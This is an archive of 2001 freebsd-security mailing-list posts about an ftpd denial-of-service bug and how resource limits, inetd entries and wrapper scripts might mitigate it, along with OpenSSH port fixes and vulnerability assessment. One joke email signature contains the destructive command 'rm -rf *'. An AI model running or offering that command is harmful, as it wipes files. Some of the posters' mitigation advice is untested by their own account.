What's vunerable? Content-Type: text/plain; charset="us-ascii" ; format="flowed" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 9:25 AM +0000 3/16/01, Peter McGarvey wrote: >I've just inherited several FreeBSD boxes. The versions range >from 3.2_RELEASE to 4.1_RELEASE. > >On the BSD boxes I already maintain I cvsup and make world on >a monthly basis - or as soon as I see a CERT advisory that I >know relates to something that can bite. But the inherited >boxes need a lot of work, and I cannot guarantee to "The Powers >That Be" that a make world wont break the box. I would buy one new box. Use that to build a new version of one of your existing boxes, and replace that system. If nothing breaks, you're in good shape. If something breaks, you still have the original box to fall back on. Fix whatever breaks until all the pieces are up and working. Then use that box to build the replacement for the next system. Repeat process. I would feel much safer with machines built from scratch, where you know what's on them and how they got that way. Also, if you have a wide variety of systems like that, it is almost certain that at least one of them will "have issues" if you try to just upgrade them in place with the latest buildworld. Not necessarily due to the buildworld process itself, but because you don't know the current state of those machines, and you don't know what customizations have been done and why they were done. -- Garance Alistair Drosehn = gad@eclipse.acs.rpi.edu Senior Systems Programmer or gad@freebsd.org Rensselaer Polytechnic Institute or drosih@rpi.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 10:29:25 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id C21B337B718 for ; Fri, 16 Mar 2001 10:29:20 -0800 (PST) (envelope-from roam@orbitel.bg) Received: (qmail 8199 invoked by uid 1000); 16 Mar 2001 18:28:37 -0000 Date: Fri, 16 Mar 2001 20:28:37 +0200 From: Peter Pentchev To: Anil Jangity Cc: freebsd-security@freebsd.org Subject: Re: Multiple vendors FTP denial of service Message-ID: <20010316202837.C428@ringworld.oblivion.bg> Mail-Followup-To: Anil Jangity , freebsd-security@freebsd.org References: <20010315215913.A70990@mollari.cthul.hu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from aj@entic.net on Fri, Mar 16, 2001 at 08:39:07AM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Mar 16, 2001 at 08:39:07AM -0800, Anil Jangity wrote: > Kris/All, > > FTPD is run as root (atleast on my machine). I don't want to limit root > resources, since I am not sure exactly what a good ball park figure for > root would be... > > I looked in ftpd(8) for some way to make it run as another user (atleast > after it starts up) but no luck. > > So, my question is, how do you propose we resource limit ftpd as you > suggest via login.conf? It might not be easy to do this via login.conf; if you are running your ftpd via inetd, though, you can use /usr/bin/limits to do that: ftp stream tcp nowait root /usr/bin/limits ftpd -d10K /usr/libexec/ftpd -l ..or you could make an ftpd wrapper: #!/bin/sh ulimit -d 10240 exec /usr/libexec/ftpd -l Having said that, I, too, haven't tested whether setting resource limits eliminates the original problem. G'luck, Peter -- The rest of this sentence is written in Thailand, on > @ I'm pretty sure (but haven't tested) that resource limits will prevent > @ this problem. Your ftpd shouldn't be using large amount of memory > @ under normal operating procedures, so you can set those to reasonable > @ values and not suffer any ill effects. > @ > @ Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 10:33:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 5EC0237B71A for ; Fri, 16 Mar 2001 10:33:21 -0800 (PST) (envelope-from roam@orbitel.bg) Received: (qmail 8263 invoked by uid 1000); 16 Mar 2001 18:32:38 -0000 Date: Fri, 16 Mar 2001 20:32:38 +0200 From: Peter Pentchev To: James Snow Cc: Kris Kennaway , Brooks Davis , Alex Popa , security@FreeBSD.ORG Subject: Re: 4.3-BETA, sshd.core found in root directory. Message-ID: <20010316203238.A8245@ringworld.oblivion.bg> Mail-Followup-To: James Snow , Kris Kennaway , Brooks Davis , Alex Popa , security@FreeBSD.ORG References: <20010313004813.A78221@ldc.ro> <20010312145754.A489@Odin.AC.HMC.Edu> <20010312152215.A94640@mollari.cthul.hu> <20010316125532.A65814@teardrop.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010316125532.A65814@teardrop.org>; from snow@teardrop.org on Fri, Mar 16, 2001 at 12:55:32PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Mar 16, 2001 at 12:55:32PM -0500, James Snow wrote: > > The problematic code is in src/crypto/openssh/auth2.c in > input_userauth_request: I believe Brian Feldman, the maintainer of OpenSSH in FreeBSD, committed a similar fix earlier today :) G'luck, Peter -- When you are not looking at it, this sentence is in Spanish. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 10:34:41 2001 Delivered-To: freebsd-security@freebsd.org Received: from mr200.netcologne.de (mr200.netcologne.de [194.8.194.109]) by hub.freebsd.org (Postfix) with ESMTP id 3D08E37B719 for ; Fri, 16 Mar 2001 10:34:39 -0800 (PST) (envelope-from pherman@frenchfries.net) Received: from husten.security.at12.de (dial-213-168-73-160.netcologne.de [213.168.73.160]) by mr200.netcologne.de (Mirapoint) with ESMTP id ACP70358; Fri, 16 Mar 2001 19:34:36 +0100 (CET) Received: from localhost (localhost.security.at12.de [127.0.0.1]) by husten.security.at12.de (8.11.3/8.11.2) with ESMTP id f2GIYMY15665; Fri, 16 Mar 2001 19:34:22 +0100 (CET) (envelope-from pherman@frenchfries.net) Date: Fri, 16 Mar 2001 19:34:22 +0100 (CET) From: Paul Herman To: Anil Jangity Cc: Subject: Re: Multiple vendors FTP denial of service In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 16 Mar 2001, Anil Jangity wrote: > FTPD is run as root (atleast on my machine). I don't want to limit root > resources, since I am not sure exactly what a good ball park figure for > root would be... The resources are set for the user who logged in through ftp. ftpd (root) does a seteuid() to the user and then sets the resource limits. So, unless you login as root over ftp, you just set limits on the user. To bad a setusercontext() call couldn't be easily implimented inside of set[e]uid() (it's in -lutil not -lc). I see too many FreeBSD admins that believe that their proftpds and qmails are protected by the limits set in /etc/login.conf. -Paul. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 10:35:41 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 30D7137B718 for ; Fri, 16 Mar 2001 10:35:38 -0800 (PST) (envelope-from roam@orbitel.bg) Received: (qmail 8327 invoked by uid 1000); 16 Mar 2001 18:34:55 -0000 Date: Fri, 16 Mar 2001 20:34:55 +0200 From: Peter Pentchev To: Anil Jangity Cc: freebsd-security@freebsd.org Subject: Re: Multiple vendors FTP denial of service Message-ID: <20010316203455.B8245@ringworld.oblivion.bg> Mail-Followup-To: Anil Jangity , freebsd-security@freebsd.org References: <20010315215913.A70990@mollari.cthul.hu> <20010316202837.C428@ringworld.oblivion.bg> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010316202837.C428@ringworld.oblivion.bg>; from roam@orbitel.bg on Fri, Mar 16, 2001 at 08:28:37PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Mar 16, 2001 at 08:28:37PM +0200, Peter Pentchev wrote: [snip] > ..or you could make an ftpd wrapper: > > #!/bin/sh > ulimit -d 10240 > exec /usr/libexec/ftpd -l This could even do something like: exec /usr/libexec/ftpd $* so it passes to ftpd the arguments it got from inetd, not the hardcoded -l. G'luck, Peter -- Do you think anybody has ever had *precisely this thought* before? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 10:39:22 2001 Delivered-To: freebsd-security@freebsd.org Received: from mr200.netcologne.de (mr200.netcologne.de [194.8.194.109]) by hub.freebsd.org (Postfix) with ESMTP id A156A37B71C for ; Fri, 16 Mar 2001 10:39:18 -0800 (PST) (envelope-from pherman@frenchfries.net) Received: from husten.security.at12.de (dial-195-14-244-155.netcologne.de [195.14.244.155]) by mr200.netcologne.de (Mirapoint) with ESMTP id ACP70804; Fri, 16 Mar 2001 19:39:16 +0100 (CET) Received: from localhost (localhost.security.at12.de [127.0.0.1]) by husten.security.at12.de (8.11.3/8.11.2) with ESMTP id f2GId8N18527; Fri, 16 Mar 2001 19:39:08 +0100 (CET) (envelope-from pherman@frenchfries.net) Date: Fri, 16 Mar 2001 19:39:08 +0100 (CET) From: Paul Herman To: Peter Pentchev Cc: Anil Jangity , Subject: Re: Multiple vendors FTP denial of service In-Reply-To: <20010316202837.C428@ringworld.oblivion.bg> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi Peter, On Fri, 16 Mar 2001, Peter Pentchev wrote: > It might not be easy to do this via login.conf; if you are running your > ftpd via inetd, though, you can use /usr/bin/limits to do that: > > ftp stream tcp nowait root /usr/bin/limits ftpd -d10K /usr/libexec/ftpd -l ftp stream tcp nowait root/login.class /usr/libexec/ftpd ftpd -l (where login.class is in /etc/login.conf) will also do the trick. > Having said that, I, too, haven't tested whether setting resource > limits eliminates the original problem. It it seems to when the CPU is limited, but as shown in a previous mail, apparently not when the memory is. Hmmm... -Paul. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 10:40:11 2001 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 0510F37B718 for ; Fri, 16 Mar 2001 10:40:06 -0800 (PST) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id NAA61437; Fri, 16 Mar 2001 13:40:01 -0500 (EST) (envelope-from wollman) Date: Fri, 16 Mar 2001 13:40:01 -0500 (EST) From: Garrett Wollman Message-Id: <200103161840.NAA61437@khavrinen.lcs.mit.edu> To: Peter Pentchev Cc: freebsd-security@FreeBSD.ORG Subject: Re: Multiple vendors FTP denial of service In-Reply-To: <20010316203455.B8245@ringworld.oblivion.bg> References: <20010315215913.A70990@mollari.cthul.hu> <20010316202837.C428@ringworld.oblivion.bg> <20010316203455.B8245@ringworld.oblivion.bg> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > This could even do something like: > exec /usr/libexec/ftpd $* Make that: exec /usr/libexec/ftpd ${1+"$@"} (Unlikely to be necessary in the case of ftpd, but that's the correct way in general.) -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 10:43:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from lunatic.oneinsane.net (lunatic.oneinsane.net [66.42.61.27]) by hub.freebsd.org (Postfix) with ESMTP id 11DAF37B71C for ; Fri, 16 Mar 2001 10:43:04 -0800 (PST) (envelope-from insane@lunatic.oneinsane.net) Received: by lunatic.oneinsane.net (Postfix, from userid 1000) id 3EFB81555B; Fri, 16 Mar 2001 07:15:12 -0800 (PST) Date: Fri, 16 Mar 2001 07:15:12 -0800 From: Ron 'The InSaNe One' Rosson To: freeBSD-security@freeBSD.org Subject: Re: Multiple vendors FTP denial of service (fwd) Message-ID: <20010316071511.A46313@lunatic.oneinsane.net> Reply-To: Ron Rosson Mail-Followup-To: freeBSD-security@freeBSD.org References: <98righ$100l$1@FreeBSD.csie.NCTU.edu.tw> <004b01c0ada9$99f7b540$db9497cf@singingtree.com> <20010315215913.A70990@mollari.cthul.hu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010315215913.A70990@mollari.cthul.hu>; from kris@obsecurity.org on Thu, Mar 15, 2001 at 09:59:13PM -0800 X-Operating-System: FreeBSD lunatic.oneinsane.net 4.2-STABLE X-Moon: The Moon is Waning Gibbous (53% of Full) X-Opinion: What you read here is my IMHO X-WWW: http://www.oneinsane.net X-GPG-FINGERPRINT: 3F11 DB43 F080 C037 96F0 F8D3 5BD2 652B 171C 86DB X-Uptime: 7:13AM up 4 days, 11:04, 1 user, load averages: 0.04, 0.05, 0.01 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris Kennaway (kris@obsecurity.org) wrote: > On Thu, Mar 15, 2001 at 03:42:29PM -0800, Michael A. Dickerson wrote: > > > 4.1 from Aug 10th is hurt by it. > > > > > > ---Mike > > > > > > > So is 4.3-beta (otherwise known as 4-stable) from March 8. ftpd uses 100% > > cpu and memory use grows until the kernel runs out of swap space and starts > > killing processes. This was an ftp connection with a regular username and > > password, in an average home directory. > > I'm pretty sure (but haven't tested) that resource limits will prevent > this problem. Your ftpd shouldn't be using large amount of memory > under normal operating procedures, so you can set those to reasonable > values and not suffer any ill effects. > > Kris But, by default are the resource limits set properly to avoid this out of the box? Or does one have to make the mod themselves. TIA -- ------------------------------------------------------------------------------ Ron Rosson ... and a UNIX user said ... The InSaNe One rm -rf * insane@oneinsane.net and all was /dev/null and *void() ------------------------------------------------------------------------------ daemon(n): 1. an attendant power or spirit : GENIUS 2. the cute little mascot of the FreeBSD operating system To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 10:50:22 2001 Delivered-To: freebsd-security@freebsd.org Received: from R181204.resnet.ucsb.edu (R181204.resnet.ucsb.edu [128.111.181.204]) by hub.freebsd.org (Postfix) with ESMTP id 6506337B718 for ; Fri, 16 Mar 2001 10:50:20 -0800 (PST) (envelope-from mudman@R181204.resnet.ucsb.edu) Received: from localhost (mudman@localhost) by R181204.resnet.ucsb.edu (8.11.1/8.11.1) with ESMTP id f2GIt4B16753; Fri, 16 Mar 2001 10:55:04 -0800 (PST) (envelope-from mudman@R181204.resnet.ucsb.edu) Date: Fri, 16 Mar 2001 10:55:04 -0800 (PST) From: mudman To: Per Christian Henden Cc: Subject: Re: weird error messages (at least I don't understand them) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > arp: unknown hardware address format (0x0800) Umm, I think someone is just trying to send you a malformed packet in hopes of knocking your machine down. Not really something to worry about, I think, if FreeBSD is tossing it out as it does above. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 12:23:30 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-202.dsl.lsan03.pacbell.net [63.207.60.202]) by hub.freebsd.org (Postfix) with ESMTP id C153037B71A for ; Fri, 16 Mar 2001 12:23:26 -0800 (PST) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 530D266B25; Fri, 16 Mar 2001 12:23:26 -0800 (PST) Date: Fri, 16 Mar 2001 12:23:26 -0800 From: Kris Kennaway To: Shoichi Sakane , kris@obsecurity.org, freebsd-security@FreeBSD.ORG Subject: Re: What's vunerable? Message-ID: <20010316122326.A98524@mollari.cthul.hu> References: <20010316014004.A86953@mollari.cthul.hu> <20010316192556Q.sakane@ydc.co.jp> <20010316144417.A22302@ringworld.oblivion.bg> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="HcAYCG3uE/tztfnV" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010316144417.A22302@ringworld.oblivion.bg>; from roam@orbitel.bg on Fri, Mar 16, 2001 at 02:44:17PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --HcAYCG3uE/tztfnV Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, Mar 16, 2001 at 02:44:17PM +0200, Peter Pentchev wrote: > On Fri, Mar 16, 2001 at 07:25:56PM +0900, Shoichi Sakane wrote: > > > > What I really need to know is what vulnerabilities exist on each bo= x - > > > > so that I can present the boss with a risk assessment, and make him > > > > decide if the box stays as is, or gets a make world. > >=20 > > > Read the advisories. > >=20 > > why don't the maintener of the ports of openssh make upgrade its versio= n ? > > current version of the ports is openssh 2.2.0 which has some vulnerabil= ity. >=20 > The version of OpenSSH in the ports tree is not plain 2.2.0, but 2.2.0 > 'port revision' 2. The 'port revision' was bumped twice to indicate > important security fixes. The 'some vulnerability' you are referring to > is probably the Bleichenbacher attack, which affected nearly all SSH > servers at the time; a fix was prompty added to the FreeBSD port. The above is correct, as is noted in the relevant FreeBSD advisory on OpenS= SH :-) Kris --HcAYCG3uE/tztfnV Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6snY+Wry0BWjoQKURAkyZAJ9MoG4EY5PHgC0/UUdseqHgUG9IuQCfXC+l qaJTMVjqbYkLF+LvqwvK5y0= =KDt7 -----END PGP SIGNATURE----- --HcAYCG3uE/tztfnV-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 12:43:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-202.dsl.lsan03.pacbell.net [63.207.60.202]) by hub.freebsd.org (Postfix) with ESMTP id EDF3937B718 for ; Fri, 16 Mar 2001 12:43:54 -0800 (PST) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 9F13F66B25; Fri, 16 Mar 2001 12:43:54 -0800 (PST) Date: Fri, 16 Mar 2001 12:43:54 -0800 From: Kris Kennaway To: Ashley Penney Cc: freebsd-security@freebsd.org Subject: Re: What's vunerable? Message-ID: <20010316124354.A98989@mollari.cthul.hu> References: <3AB1DBF9.C721E3D6@vianetworks.co.uk> <20010316121158.A17693@daphne.unloved.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="wac7ysb48OaltWcw" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010316121158.A17693@daphne.unloved.org>; from ashp@unloved.org on Fri, Mar 16, 2001 at 12:11:58PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --wac7ysb48OaltWcw Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, Mar 16, 2001 at 12:11:58PM +0100, Ashley Penney wrote: > One suggestion I would have is to pop to www.nessus.org, and use the > scanner they provide. It can output reports in HTML and so forth, with > pretty graphics for PHB's. However, it can sometimes trigger false > alarms so I'd run it against the boxes, and check the results by hand. >=20 > [I've found this very useful when I suddenly get thrown into 500 boxes, > all running different versions of OS's.] Always be careful trusting the results of automated scanners, because they can never contain a database of ALL known vulnerabilities, so your system may have other problems than what's noted there. It may be useful as a backup to make sure you haven't missed anything, though. Kris --wac7ysb48OaltWcw Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6snsKWry0BWjoQKURAu9IAJ4znVXrVf2ST0kyvVICmENlR7wtTgCfdlSu P7/S2BiRNrjjXh871TFS4Cw= =aHJw -----END PGP SIGNATURE----- --wac7ysb48OaltWcw-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 12:48:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-202.dsl.lsan03.pacbell.net [63.207.60.202]) by hub.freebsd.org (Postfix) with ESMTP id 268BD37B71A for ; Fri, 16 Mar 2001 12:48:12 -0800 (PST) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 7A22C66B25; Fri, 16 Mar 2001 12:48:08 -0800 (PST) Date: Fri, 16 Mar 2001 12:48:08 -0800 From: Kris Kennaway To: Ron 'The InSaNe One' Rosson Cc: freeBSD-security@freeBSD.org Subject: Re: Multiple vendors FTP denial of service (fwd) Message-ID: <20010316124808.B98989@mollari.cthul.hu> References: <98righ$100l$1@FreeBSD.csie.NCTU.edu.tw> <004b01c0ada9$99f7b540$db9497cf@singingtree.com> <20010315215913.A70990@mollari.cthul.hu> <20010316071511.A46313@lunatic.oneinsane.net> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="Fba/0zbH8Xs+Fj9o" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010316071511.A46313@lunatic.oneinsane.net>; from insane@lunatic.oneinsane.net on Fri, Mar 16, 2001 at 07:15:12AM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --Fba/0zbH8Xs+Fj9o Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, Mar 16, 2001 at 07:15:12AM -0800, Ron 'The InSaNe One' Rosson wrote: > Kris Kennaway (kris@obsecurity.org) wrote: > > On Thu, Mar 15, 2001 at 03:42:29PM -0800, Michael A. Dickerson wrote: > > > > 4.1 from Aug 10th is hurt by it. > > > > > > > > ---Mike > > > > > > >=20 > > > So is 4.3-beta (otherwise known as 4-stable) from March 8. ftpd uses= 100% > > > cpu and memory use grows until the kernel runs out of swap space and = starts > > > killing processes. This was an ftp connection with a regular usernam= e and > > > password, in an average home directory. > >=20 > > I'm pretty sure (but haven't tested) that resource limits will prevent > > this problem. Your ftpd shouldn't be using large amount of memory > > under normal operating procedures, so you can set those to reasonable > > values and not suffer any ill effects. > >=20 > > Kris >=20 > But, by default are the resource limits set properly to avoid this out > of the box? Or does one have to make the mod themselves. You have to tune resource limits as appropriate for your local operating environment. Kris --Fba/0zbH8Xs+Fj9o Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6snwHWry0BWjoQKURAo1XAJ41taxJNIk40WyL0E75yWDW06DPTACfZovh gbB3L8KuAEgdoNeNgqI74hA= =rrM9 -----END PGP SIGNATURE----- --Fba/0zbH8Xs+Fj9o-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 13: 2:43 2001 Delivered-To: freebsd-security@freebsd.org Received: from mr200.netcologne.de (mr200.netcologne.de [194.8.194.109]) by hub.freebsd.org (Postfix) with ESMTP id C8F8C37B718 for ; Fri, 16 Mar 2001 13:02:40 -0800 (PST) (envelope-from pherman@frenchfries.net) Received: from husten.security.at12.de (dial-213-168-72-106.netcologne.de [213.168.72.106]) by mr200.netcologne.de (Mirapoint) with ESMTP id ACP85460; Fri, 16 Mar 2001 22:02:38 +0100 (CET) Received: from localhost (localhost.security.at12.de [127.0.0.1]) by husten.security.at12.de (8.11.3/8.11.2) with ESMTP id f2GL2RB49212; Fri, 16 Mar 2001 22:02:27 +0100 (CET) (envelope-from pherman@frenchfries.net) Date: Fri, 16 Mar 2001 22:02:27 +0100 (CET) From: Paul Herman To: "ho-sang, yoon" Cc: , Kris Kennaway Subject: Re: Multiple vendors FTP denial of service (fwd) In-Reply-To: <20010315215913.A70990@mollari.cthul.hu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 16 Mar 2001, ho-sang, yoon wrote: > $ whoami > ftp > $ ulimit -a > [...] > data seg size (kbytes, -d) 524288 > stack size (kbytes, -s) 65536 > core file size (512-blocks, -c) 102400 > max memory size (kbytes, -m) 20480 > locked memory (kbytes, -l) 10240 > [...] > > ---top----------------------------------------------------------------------- > PID USERNAME PRI NICE SIZE RES STATE TIME WCPU CPU COMMAND > 6379 root 55 0 33360K 33016K RUN 0:40 86.02% 84.67% ftpd > [cut] > ----------------------------------------------------------------------------- > > I don't think that the resourse limit does effect on this matter. > Or, am I something wrong? I, too, had thought that "max memory size" (or RLIMIT_RSS) would have kicked in, but it didn't. However, what does work is setting the "datasize" (RLIMIT_DATA), which will kill ftpd when "SIZE" exceeds RLIMIT_DATA. Now I'm wondering about RLIMIT_RSS, i.e. the amount of memory in core. I'm perusing through sys/vm now... -Paul. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 13:17:37 2001 Delivered-To: freebsd-security@freebsd.org Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id 37F1637B718 for ; Fri, 16 Mar 2001 13:17:35 -0800 (PST) (envelope-from dillon@earth.backplane.com) Received: (from dillon@localhost) by earth.backplane.com (8.11.2/8.9.3) id f2GLGm674347; Fri, 16 Mar 2001 13:16:48 -0800 (PST) (envelope-from dillon) Date: Fri, 16 Mar 2001 13:16:48 -0800 (PST) From: Matt Dillon Message-Id: <200103162116.f2GLGm674347@earth.backplane.com> To: Paul Herman Cc: "ho-sang, yoon" , , Kris Kennaway Subject: Re: Multiple vendors FTP denial of service (fwd) References: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :> :> I don't think that the resourse limit does effect on this matter. :> Or, am I something wrong? : :I, too, had thought that "max memory size" (or RLIMIT_RSS) would have :kicked in, but it didn't. However, what does work is setting the :"datasize" (RLIMIT_DATA), which will kill ftpd when "SIZE" exceeds :RLIMIT_DATA. : :Now I'm wondering about RLIMIT_RSS, i.e. the amount of memory in core. :I'm perusing through sys/vm now... : :-Paul. The 'datasize' limit (RLIMIT_DATA) only applies to malloc(). It does not apply to mmap(). This is a known issue. In anycase, it would depend on what ftpd uses. I would expect ftpd to use malloc() for internal structures and perhaps mmap() (or sendfile()) when reading a file. The 'memoryuse' limit (RLIMIT_RSS) only applies to the process'es in-core size. If the process exceeds this value and the machine is loaded down, the kernel will attempt to swap pages out to get the process back within the limit. If the machine is mostly idle, the kernel ignores this limit. Currently we have no resource to limit mmap() use. -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 17:28:11 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id 662C437B718 for ; Fri, 16 Mar 2001 17:28:08 -0800 (PST) (envelope-from rsimmons@wlcg.com) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.3/8.11.3) with ESMTP id f2H1Rfj30921; Fri, 16 Mar 2001 20:27:41 -0500 (EST) (envelope-from rsimmons@wlcg.com) Date: Fri, 16 Mar 2001 20:27:37 -0500 (EST) From: Rob Simmons To: Anil Jangity Cc: Subject: Re: Multiple vendors FTP denial of service In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 You can change the user that ftpd runs as in inetd.conf. Robert Simmons Systems Administrator http://www.wlcg.com/ On Fri, 16 Mar 2001, Anil Jangity wrote: > Kris/All, > > FTPD is run as root (atleast on my machine). I don't want to limit root > resources, since I am not sure exactly what a good ball park figure for > root would be... > > I looked in ftpd(8) for some way to make it run as another user (atleast > after it starts up) but no luck. > > So, my question is, how do you propose we resource limit ftpd as you > suggest via login.conf? > > Thanks > > Anil > > @ I'm pretty sure (but haven't tested) that resource limits will prevent > @ this problem. Your ftpd shouldn't be using large amount of memory > @ under normal operating procedures, so you can set those to reasonable > @ values and not suffer any ill effects. > @ > @ Kris > @ > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6sr2Nv8Bofna59hYRAulRAKC20qJDD9H8hSVmW0TUxrPggy2YZwCfcuPz aCyNKaYxkf5yauK9UpD9UGQ= =Utb5 -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 16 18: 6:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from imo-m06.mx.aol.com (imo-m06.mx.aol.com [64.12.136.161]) by hub.freebsd.org (Postfix) with ESMTP id D780637B71A for ; Fri, 16 Mar 2001 18:06:49 -0800 (PST) (envelope-from aykatsue@netscape.net) Received: from aykatsue@netscape.net by imo-m06.mx.aol.com (mail_out_v29.5.) id n.ef.110874e (16226) 